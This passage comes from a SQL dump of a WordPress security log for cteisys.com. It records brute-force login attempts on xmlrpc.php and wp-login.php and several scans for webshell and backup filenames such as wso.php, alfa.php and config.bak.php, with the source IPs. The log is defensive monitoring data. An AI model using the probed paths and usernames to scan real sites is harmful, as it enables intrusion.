3goWueLirz9ES','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1664651650.5682,152,'ZInP8ERvsxzuK3DWrhaFQq16','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.105.240',2261871088,'newd',0,1664651946.8927,152,'C3lX71itIHYdQ0gy2fkZsoeA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'newd',0,1664652209.6186,152,'l7soJPgEz0LjapQMtnk3d5Uw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1664652486.6626,152,'ozG03btUSLNEFTZwXfnJaeru','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.154.69.85',3097118037,'newd',0,1664652714.3462,152,'4sRgQhI9a5mzx7HeSucpTvPW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.56.59.9',2067282697,'newd',0,1664653045.0702,152,'aR2q4uUvIclbmQeMTwEYGSVk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1664653572.4680,152,'PAVbZSg25z1UWQweq0tpDf8r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.39.235',3496814571,'newd',0,1664653775.0150,152,'KLOoG4FvxNpyHtIks3Pdf8Th','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'newd',0,1664654076.1191,152,'KcG5FvCXbWEZJalqASBO64DT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.56.160.61',1731764285,'newd',0,1664654309.9136,152,'RC0tOUVN6v2I4iMQmr3B8nWy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1664655427.9896,152,'MuE2oSfNZtl0diRDYahGHKzk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.39.240.246',338161910,'',0,1664655789.9922,55,'xRGwBZ3s9OYUEVy2d6C8DISp','','19|0|0|0|cteisys.com/xltavrat.php',0,19,0),('8.218.143.243',148541427,'newd',0,1664655935.0317,152,'oEFqMhKV8GbpBrIjxSJRD4zC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.90.101.113',1046111601,'admin',0,1664656120.8203,152,'SkJOwHK7jIb5cT1GyPNWdgaX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.90.175',1701010095,'admin',0,1664656371.0625,152,'LkHZDNChtg1xVyBni04GzApe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.229.214.93',786814557,'admin',0,1664656928.7707,152,'cefSMXbpZx48iv3KqFl71GID','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.223.36.152',1876894872,'newd',0,1664657203.0634,152,'3DGoRAmkKf4vcujibgwya1E5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.23.254.254',1125646078,'newd',0,1664657460.4466,152,'s6p3zDXB1dKHWi9mbCaYNSj8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.87.194.140',1347928716,'newd',0,1664657786.3300,152,'bZ8hrCafJjKP3OFx25LyAHdI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.40.238.50',2032725554,'newd',0,1664657990.0374,152,'wP9KV3oLl5tu2bEC0vn6YFOa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'newd',0,1664659436.7143,152,'F80qvjfs4UyDrNWnP7Q9Yce6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'newd',0,1664659673.5876,152,'K7x3fFA29OwpimCPkDXrIH4j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.49.253',3515691517,'newd',0,1664659776.4894,7,'5wQUPs3C4Hdft2uhaDKmTMV1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664660224.3781,152,'ZCgYTd5Q4W32FIAmoq1HfBsR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.6.184',1807550136,'Joyce',0,1664660424.3924,51,'DHZRn17ScGWjdguECrUvOqIX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.17.110',2884899182,'newd',0,1664660497.0090,152,'XdclhLDANbHpYvnPtjV1xTUg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'newd',0,1664660775.5777,152,'g3OwmUWFSzA7K8XG2ID4o5Jt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.168.187',267102395,'newd',0,1664661084.8025,152,'wCuSYPnfe12lts08UcEMJxK9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664661205.5705,7,'ocY2CbAn3sgmkB6JhlLNzO9H','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1664661300.4332,152,'gWiu3rJoKesaqDXv59hk1xYI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'newd',0,1664663544.5872,152,'LK3QO67DsaiHXRxZSlrYoyPb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.88.147',2707511443,'newd',0,1664664089.4856,152,'ArqKtQi6f4n1NoUB7XRej2H5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1664664404.9594,152,'G8mb7HcQg1LWt6SNeIsRrl5F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.64.218.102',574675558,'newd',0,1664664634.3503,152,'e4XYJt2KFDRl0O7bui3sHzf9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.174.216',2733747928,'newd',0,1664667829.5492,152,'ETh5proVKN38nF6JdsRwy04U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.193.197.89',599901529,'newd',0,1664668084.8359,152,'eO7JrY0i8LCzyh1bmTju3vWU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.223.63.152',2682208152,'newd',0,1664668450.9802,152,'aWFyA3Qzq94ZxY0Rm6CGe2jv','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('159.203.31.171',2680889259,'newd',0,1664668678.4097,152,'kPTuG3LJlmnbNtAZXdBaeUp6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.255.59.83',352271187,'',0,1664697037.4236,55,'4aqv5uKi1rCGg7dtBeIJXOhy','','19|0|0|0|cteisys.com/media-admin.php',0,19,0),('20.255.59.83',352271187,'',0,1664697038.2864,55,'sVvCKAoTudza5pLQbYPf48Wj','','19|0|0|0|cteisys.com/export.php',0,19,0),('20.255.59.83',352271187,'',0,1664697038.9611,55,'qYy10IoRAfeV68murOzJktMF','','19|0|0|0|cteisys.com/wp-content/export.php',0,19,0),('20.255.59.83',352271187,'',0,1664697039.9830,55,'GarMLxqVBstTFdC50Wy82QnR','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('20.255.59.83',352271187,'',0,1664697040.9847,55,'BZzYEfNwpdRF257iJoeDu9h6','','19|0|0|0|cteisys.com/wp-includes/wp-atom.php',0,19,0),('20.255.59.83',352271187,'',0,1664697041.9149,55,'l7uxciod4ryZB38CqzXkWb09','','19|0|0|0|cteisys.com/wp-includes/images/css.php',0,19,0),('20.255.59.83',352271187,'',0,1664697042.7532,55,'l1w6RPaVmybK5Zc2UQX8ki3v','','19|0|0|0|cteisys.com/wp-includes/css/css.php',0,19,0),('20.255.59.83',352271187,'',0,1664697043.6075,55,'AZg6Cms5bHeXq04vl1D3nIiN','','19|0|0|0|cteisys.com/defau1t.php',0,19,0),('20.255.59.83',352271187,'',0,1664697044.4516,55,'0QmJ7KpDMEgqPVzO3nd8hj6w','','19|0|0|0|cteisys.com/moduless.php',0,19,0),('20.255.59.83',352271187,'',0,1664697045.2832,55,'Dd3sePzqBt5OWbVUc2jZ7n4p','','19|0|0|0|cteisys.com/wp-booking.php',0,19,0),('20.255.59.83',352271187,'',0,1664697046.4166,55,'69GiDb4nvWtXNPgTSI1Zjsqk','','19|0|0|0|cteisys.com/wp-content/plugins/backup_index.php',0,19,0),('20.255.59.83',352271187,'',0,1664697047.6829,55,'XERnw8DkOGdob3PHVJx2CtZa','','19|0|0|0|cteisys.com/wp-content/mu-plugins/db-safe-mode.php',0,19,0),('20.255.59.83',352271187,'',0,1664697048.5327,55,'lNx4MUrBaR5sQhjzOLSFqf1m','','19|0|0|0|cteisys.com/wp-includes/css/wp-config.php',0,19,0),('20.255.59.83',352271187,'',0,1664697049.4068,55,'wbckuIf8v1gZP3eC5V0dAoDF','','19|0|0|0|cteisys.com/config.bak.php',0,19,0),('20.255.59.83',352271187,'',0,1664697050.0963,55,'GLbO1cpHPWzMYirtU3Kkfh9Q','','19|0|0|0|cteisys.com/wp-content/themes/config.bak.php',0,19,0),('20.255.59.83',352271187,'',0,1664697051.0502,55,'W6sJ4tRlSoOGYxLh7zTcub0n','','19|0|0|0|cteisys.com/legion.php',0,19,0),('20.255.59.83',352271187,'',0,1664697052.5115,100,'qTJDWZmoxlHMGYN9Rcve5rPz','','13|0|0|0|cteisys.com/wp-content/plugins/wpconfig.bak.php',0,13,0),('20.255.59.83',352271187,'',0,1664697053.6501,55,'Ge8tQP6zJxIVWUopTv1i3KHq','','19|0|0|0|cteisys.com/wp-plugins.php',0,19,0),('20.255.59.83',352271187,'',0,1664697055.1933,55,'QLFjVDYNvheugHRO8rz60Wos','','19|0|0|0|cteisys.com/gank.php.PhP',0,19,0),('20.255.59.83',352271187,'',0,1664697056.2054,55,'noTSwcU0u7h9MpLe51DzrIVN','','19|0|0|0|cteisys.com/wp-content/db-cache.php',0,19,0),('20.255.59.83',352271187,'',0,1664697058.2802,55,'k1Ixh7MLsbK36QHJlWOFGquN','','19|0|0|0|cteisys.com/archives.php',0,19,0),('20.255.59.83',352271187,'',0,1664697059.2401,55,'rS8vfabFGLklR7jUJwYQ1tyi','','19|0|0|0|cteisys.com/defau11.php',0,19,0),('20.255.59.83',352271187,'',0,1664697060.4181,100,'VqdzSsfCOeEAbw1HulPcvKZh','','13|0|0|0|cteisys.com/wp-content/outcms.php',0,13,0),('20.255.59.83',352271187,'',0,1664697062.2639,100,'5QUsiWYNZkI8zAnCuy7EtmSr','','13|0|0|0|cteisys.com/system_log.php',0,13,0),('20.255.59.83',352271187,'',0,1664697064.3992,55,'ISsdFQOxgWthma2oKwkb67nN','','19|0|0|0|cteisys.com/wp-backup-sql-302.php',0,19,0),('20.255.59.83',352271187,'',0,1664697066.6233,100,'4I2zqEKRspWAjYFnVm5vOyZt','','13|0|0|0|cteisys.com/error.php',0,13,0),('20.255.59.83',352271187,'',0,1664697115.2341,55,'WIjDJlFO0nhzGBTUNgRCkiVt','','19|0|0|0|cteisys.com/wp-content/plugins/ubh/up.php',0,19,0),('20.255.59.83',352271187,'',0,1664697116.0663,100,'3BeIkOFSPtvHf8chWri1VULn','','13|0|0|0|cteisys.com/index.php',0,13,0),('20.255.59.83',352271187,'',0,1664697116.8010,55,'EdSFteMvorhqZY8su5azcUAi','','19|0|0|0|cteisys.com/olux.php',0,19,0),('20.255.59.83',352271187,'',0,1664697117.4886,55,'BLCKJalkNUgYnTmIe32r8xus','','19|0|0|0|cteisys.com/xleet.php',0,19,0),('20.255.59.83',352271187,'',0,1664697118.2207,55,'cyjrBHpD1STYtIWhKeMEVPUv','','19|0|0|0|cteisys.com/wso.php',0,19,0),('20.255.59.83',352271187,'',0,1664697118.9267,55,'LfyuisnjIVKO5g8FABR9zcTb','','19|0|0|0|cteisys.com/shell.php',0,19,0),('20.255.59.83',352271187,'',0,1664697119.6799,55,'UXVjA1t0YoKZbqnHcBNOaewT','','19|0|0|0|cteisys.com/up.php',0,19,0),('20.255.59.83',352271187,'',0,1664697120.3837,55,'XPwDNJ2qY5Qoat6fzKjCycsx','','19|0|0|0|cteisys.com/upload.php',0,19,0),('20.255.59.83',352271187,'',0,1664697121.0933,55,'eiQRKVcgYh7nzN1bq8F03lCk','','19|0|0|0|cteisys.com/1.php',0,19,0),('20.255.59.83',352271187,'',0,1664697121.8494,55,'Qfk5TIrX0tBwALUszW7cJj3d','','19|0|0|0|cteisys.com/x.php',0,19,0),('20.255.59.83',352271187,'',0,1664697122.7030,55,'YQ3vTx1NUSld6yi894PpBjc5','','19|0|0|0|cteisys.com/z.php',0,19,0),('20.255.59.83',352271187,'',0,1664697123.5139,55,'MYlc8jLwIEWyUHSRaAX9x7Vz','','19|0|0|0|cteisys.com/a.php',0,19,0),('20.255.59.83',352271187,'',0,1664697124.2413,55,'dOKxmXwcuZoChJjvp3LBA6RQ','','19|0|0|0|cteisys.com/test.php',0,19,0),('20.255.59.83',352271187,'',0,1664697125.0979,55,'zfHLGABeZMPoXKJNnyxu4Dk7','','19|0|0|0|cteisys.com/wp.php',0,19,0),('20.255.59.83',352271187,'',0,1664697125.7830,55,'HZ5YM74lep9QcjnO6DJb1Ntw','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('20.255.59.83',352271187,'',0,1664697126.4815,55,'xJ1jhKuaZ2DWR0TksngvEpCU','','19|0|0|0|cteisys.com/config.php',0,19,0),('20.255.59.83',352271187,'',0,1664697127.1678,55,'GfoU7SQ8rET9wk0ncRFWheCq','','19|0|0|0|cteisys.com/templates/beez3/index.php',0,19,0),('20.255.59.83',352271187,'',0,1664697127.8729,55,'DvroiNBPGwx6hKyQZj3AHa2S','','19|0|0|0|cteisys.com/about.php',0,19,0),('20.255.59.83',352271187,'',0,1664697128.5395,55,'b0XP2nBJSf7Ie9lOZNyx3Amu','','19|0|0|0|cteisys.com/shells.php',0,19,0),('192.163.195.60',3231957820,'newd',0,1664706938.8291,152,'7wKyPXdgcjqTC92OM03B618I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.90.175',1701010095,'newd',0,1664707472.9633,152,'GZNxM9OoisbjUyVFEJz3aprk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('83.143.116.3',1401910275,'newd',0,1664707994.9897,152,'70hFcLqKj2H8BUXldM5grpS4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('108.167.151.32',1822922528,'newd',0,1664708264.7955,152,'FwR0pH2uhIjNATDvcXxYq18G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.153.249.218',2694445530,'newd',0,1664710101.0556,152,'mO7VoU3pJK4DQqYEMdFrhAu8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.230.191',2335958719,'',0,1664710181.4399,55,'gLlY2vBS6dcrqhwTEiOk5bjW','','19|0|0|0|cteisys.com//wp-22.php',0,19,0),('103.166.182.177',1738978993,'wadminw',0,1664710752.6573,51,'kw23QZmKxqf4bDGN1dMLBE8v','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.225.4.20',1088488468,'wwwadmin',0,1664711215.0354,51,'5AsdKSVwZTXaW7CUzGY1RMEm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.99.78.164',2808303268,'admin',0,1664711946.8968,152,'3uyMzBcbthTDdCWEkUR0sjgn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.154.177.165',1738191269,'newd',0,1664714241.1142,152,'70rMSpugeIjQ6JNDGLbdvy3U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('210.211.113.130',3537072514,'newd',0,1664714848.1749,152,'ywi9Wn7ZjsSFMGb5LH3xXvKN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1664715169.8203,152,'O7FtrHWVS9jzwkbJp50ILsKn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'newd',0,1664715388.2956,7,'sZn78EDGzaMKUYbkVp6QqHre','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('101.0.73.142',1694517646,'newd',0,1664717717.1465,152,'dBevWz6uZMEk82K4ynVpC7b9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.225.76.130',3286322306,'newd',0,1664718061.3528,152,'wDkIcPaGBsi6SVMXHNAUe4qC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('210.211.113.130',3537072514,'newd',0,1664718730.8661,152,'ICuMm85tscdOkBrvNeqaWZQ7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.37.194',3515688386,'Joyce',0,1664718911.8424,51,'bSVeWLlruxZ8ayE7ov4DTg9j','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664719071.6426,152,'CGui4anWHVvPbgoZYJMT6xSs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.86.229.13',576120077,'newd',0,1664720421.6972,152,'d8oS4yVRenwPQXts6hNxOZT9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.250.202.147',3120220819,'newd',0,1664720428.0919,152,'S4Xk0C6TIp2fYzV5uNJQtL7R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.61.232.79',3393054799,'newd',0,1664720429.4663,152,'kNeKaIhqCTOfM4VvuZ5Drmlc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'newd',0,1664720437.6957,152,'G8iVaC1ZWdsQUKfDlu4mhcJF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.210.196.65',3235038273,'newd',0,1664720438.4008,152,'FPSbgChKG1yQWuE8eJIZi3oH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.13',3103917581,'newd',0,1664720440.6575,152,'oQG1HVZnzKmqgdwYP5NpOXA6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.76.19',3642051603,'newd',0,1664720441.5796,152,'3Zpal6xy8BG2KLRibEn5VYk0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.109.113',1496214897,'newd',0,1664720449.1127,152,'Zq8CBgA9sEvOtMbzyjwToLJl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.198.161.92',2412159324,'newd',0,1664720449.4283,152,'ugeWhaCob2Nqt3vH4JMBXsnF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.154.184.152',1738193048,'newd',0,1664720800.8183,152,'WDUdEN4Bw5S1xv290sh3bu8F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1664721155.4145,152,'7amE1ZSGoCyYu9keJ26I53tc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.124.206.22',863817238,'newd',0,1664721383.2080,152,'Acgvq3L9fDidEym6FPk7jbOl','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('51.124.206.22',863817238,'newd',0,1664721384.6535,7,'fJxl8a4EocPwbmBTnM75vZeG','','0|0|0|0|cteisys.com//wp-login.php',0,0,0),('35.195.135.67',600016707,'newd',0,1664721884.2992,152,'XOG1y9ecJvt4rWNxF3ATnV5i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1664722257.7270,152,'PRhbdkLo93NBErS8TM2uZsvc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'nathaniel-lipka',0,1664722468.8875,51,'i7YmpR2CZUwT4Kv563ujArVM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.212.34.36',3168018980,'newd',0,1664722620.0726,152,'gzKBGZ4w1yUVocN3l6urIFSE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.73.106.20',3091819028,'newd',0,1664724467.3991,152,'KyTlLEsk9SqDA2o7efBcHvCW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.29.76.78',1209879630,'newd',0,1664724864.4758,152,'9gybx3HRvOMGE5AtIndmT2oD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1664725565.5057,55,'Xi47eq6LkhHS9JOwYM0sDpjb','','19|0|0|0|cteisys.com/wp-content/themes/Nuance/functions/jwpanel/scripts/valums_uploader/php.php',0,19,0),('128.199.109.135',2160553351,'newd',0,1664725619.3869,152,'UMkcGfO0eEIBrAHVqdQS8K5s','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.145.163',2487390627,'newd',0,1664725662.6989,152,'Da6NMsToPmGQCxyrOnXR0U8E','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.79.3',3496824579,'newd',0,1664725667.4904,152,'gO5hkAGaDH149lpz83qrS2oe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664725668.0749,152,'e3lB6EOkaMGIZcuwzAh97x8R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'newd',0,1664725673.2544,152,'lgtmcRAS4TVnLi0Dw2ey8YP1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('156.67.73.38',2621655334,'newd',0,1664725681.2842,152,'MsTzpiuYCAOvtoUELl1VIdJG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.17',1364735249,'newd',0,1664726024.3456,152,'D9fVdoKbqZPEQUNCriyHYItg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.244.77.192',1760841152,'Joyce',0,1664726974.8473,51,'0qsZiWFOfv2mIN8detnBhYb1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.59.165.88',3258688856,'newd',0,1664727213.6611,152,'LpfFPm5WAuv7TBS42UJXoqNE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.210.66.35',533873187,'wadminw',0,1664727953.1659,152,'efIAl7xwY4j0SZQoM3dqb8Cs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'nathaniel-lipka',0,1664728155.4453,51,'chM9bqZSBIOD18jArklHQTCU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('41.216.188.45',702069805,'',0,1664728179.9382,55,'hO6E2bXN8dKymiQtG5aVgZRM','','19|0|0|0|cteisys.com/wp-includes/class-wordpress-license.php',0,19,0),('41.216.188.45',702069805,'',0,1664728182.0420,55,'q2nDr6OivctZ5VAEKzQYxbNp','','19|0|0|0|cteisys.com/wp-includes/class-wordpress-license.php',0,19,0),('41.216.188.45',702069805,'',0,1664728184.1638,55,'nsQYJaLV04pzZbXu2IAOUTDN','','19|0|0|0|cteisys.com/wp-includes/class-index-wordpress.php',0,19,0),('41.216.188.45',702069805,'',0,1664728186.8054,55,'zrRbMYjewKk6VLQhUCO13WsG','','19|0|0|0|cteisys.com/wp-includes/class-index-wordpress.php',0,19,0),('185.250.202.147',3120220819,'newd',0,1664728502.3976,152,'fgSvD5uMErwUZQTNVzXO9PlW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.88.95',1386567775,'newd',0,1664728502.4219,152,'RDbQ7AyfOFpwo146ET9qrBSP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.226.80.84',786583636,'newd',0,1664728502.5832,152,'R36D2l9iUJYQGsKnMm4qSNOf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664728508.7805,152,'13zLdkFRsWKE8rhIJGZ9CVBe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('65.2.119.66',1090680642,'newd',0,1664728511.1154,152,'4fsmUPZ9Q20N8KGBqTo5kJdc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.232.14.51',3118992947,'newd',0,1664728517.3316,152,'2bBxHKwcmyX3ELProhRCO57Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.213.249.210',2731932114,'newd',0,1664728520.3501,152,'RpdQwAG9Ej5CtB2niDmLo1Pg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.77.162',3642052002,'newd',0,1664728523.3816,152,'7wsHXUKBloLjfvSDMG6qEgiZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.189.176.172',1539158188,'newd',0,1664728530.0613,152,'jKL71sf5xCvyJ8qgVSX6YQBu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664728531.0554,152,'NIDtdfAuVnyzYLweRW8EZvKm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.74.145.155',1347064219,'newd',0,1664728532.3932,152,'bGCx923tZY61Djl8wuWFdfyh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.99.248.98',1482946658,'newd',0,1664731767.2265,152,'P61NpwFDdIav7tJfERYjU9Zy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.224.138.16',3118500368,'newd',0,1664731770.9179,152,'GRwZHNWPC5ux2M4h0StJkpXj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.213.249.210',2731932114,'newd',0,1664731771.3865,152,'PUDnRLjqbe0IHWcaJ2FtC9Q8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.22.153.127',1410767231,'newd',0,1664731775.7323,152,'b1vNQuMPTpAVGriFOJWy6gcX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('129.143.253.19',2173697299,'newd',0,1664731780.3685,152,'Z0EtsnMJRUexi1dLPY4K7gjT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.49.240',3328324080,'Joyce',0,1664732651.1073,51,'XvnT6EtO1Mi7IdWDxLqarGCb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.142.136.99',864979043,'',0,1664735300.7307,55,'4khKxmiyQfe0CdEaAM1uNFJI','','19|0|0|0|cteisys.com/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',0,19,0),('92.204.161.74',1556914506,'newd',0,1664762521.6676,152,'ZaFexvcqLUmh2zrE8Hu0SYD9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.242.115.115',804418419,'newd',0,1664762525.0777,152,'x0FeIdjzqpDoaPns3KLl1hGE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'newd',0,1664762526.4881,152,'wmBcO3sXCpr4D725zJPSQHav','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.40.255.186',2083061690,'admin',0,1664762606.5847,152,'j8KcfI4PnYZ0VvzUEHC356MB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.152.219',1138661595,'admin',0,1664762622.6427,152,'uyhUVGQM15XYF8jq2RaopJfL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.107.177.243',3194728947,'newd',0,1664762876.0338,152,'qFBmZDh5Vp2u81gz34KAlHf0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.109.101.102',342713702,'newd',0,1664762919.1659,152,'CpeHjaOSbNEMtyP5Lv4c1mJz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.125.239.179',763228083,'newd',0,1664763155.1457,152,'eEnG4c2pKTPXvz8rCR57xlMj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.126.219.43',3112098603,'newd',0,1664763162.3620,152,'V5UrICcOwnGslz10BvLd7ajY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.59.165.88',3258688856,'newd',0,1664763415.7404,152,'vLuxytDwAOnSFJ9j3ioWP2KQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.247.212',1807022036,'newd',0,1664763695.1889,152,'yKe25H84So3kRd6pTPGE7zjn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.84.132',1735283844,'newd',0,1664763698.0134,152,'1Cx9bQmLfIlUGZBXsvAku0jD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.22.89.6',2769705222,'newd',0,1664763974.3492,152,'Gz4WJ6IK9qXhRsSDfC8QpjNA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.149.124',3497104764,'newd',0,1664763974.3725,152,'RlDjGdxIUyQO1uMtsZ2mEBfp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.124.210.118',2994524790,'newd',0,1664764222.3533,152,'fojc6QJ3gxFSZRmIMK1YWqX0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.126.219.43',3112098603,'newd',0,1664764227.8215,152,'rxnqQjl1cDy2bUPgkhWLZ438','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.145.50.127',1737568895,'newd',0,1664764502.4091,152,'FMBVCRjmczbhHTDN1iwunJ34','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.14.224.167',755949735,'newd',0,1664764502.4453,152,'eRG9iN0ZMB8XHnvjSFldTwYq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.79.239.127',1632628607,'newd',0,1664764752.0266,152,'8SmFwdcCZYanTGx5ADBJKs9h','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.21.138',2160530826,'newd',0,1664764999.2130,152,'Tqa4YlKUhV2Znc8e6GspARIx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.104.173',2994759853,'newd',0,1664764999.2249,152,'fJlNFhY0qbjPBmEMt5A12Oap','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.105.232',866085352,'newd',0,1664